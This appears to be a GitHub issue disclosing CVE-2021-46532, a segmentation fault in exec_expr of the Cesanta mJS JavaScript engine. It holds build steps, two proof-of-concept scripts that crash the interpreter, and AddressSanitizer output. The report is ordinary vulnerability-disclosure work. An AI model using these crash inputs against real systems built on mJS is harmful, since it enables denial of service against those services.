Headline
CVE-2021-46532: SEGV src/mjs_exec.c:347 in exec_expr · Issue #203 · cesanta/mjs
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via exec_expr at src/mjs_exec.c. This vulnerability can lead to a Denial of Service (DoS).
mJS revision
Commit: b1b6eac
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
save the makefile then make
make
Test case1poc.js
[""]isNaN[NaN] = 2;
Test case2poc.js
function T(o) {
for (let i = 0; i < 2; i++)
JSON.stringify[i] =-undefined;
o.length = undefined;
return o;
}
function JSEtest(a) {
T(a);
undefined + T(0) + T(0);
for(let i = 0; i < 10000000; i++) {}
}
JSEtest({});
Execution steps & Output
$ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= =====ERROR: AddressSanitizer: SEGV on unknown address 0x560130588150 (pc 0x56013054b8c1 bp 0xfff2560130588150 sp 0x7ffde3a287f0 T0) =====The signal is caused by a WRITE memory access. #0 0x56013054b8c0 in exec_expr src/mjs_exec.c:347 #1 0x56013054b8c0 in mjs_execute src/mjs_exec.c:888 #2 0x560130550a05 in mjs_exec_internal src/mjs_exec.c:1073 #3 0x560130550a05 in mjs_exec_file src/mjs_exec.c:1096 #4 0x56013050d909 in main src/mjs_main.c:47 #5 0x7f497ee31b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #6 0x56013050e449 in _start (/usr/local/bin/mjs+0xe449)
AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/mjs_exec.c:347 in exec_expr
Credits: Found by OWL337 team.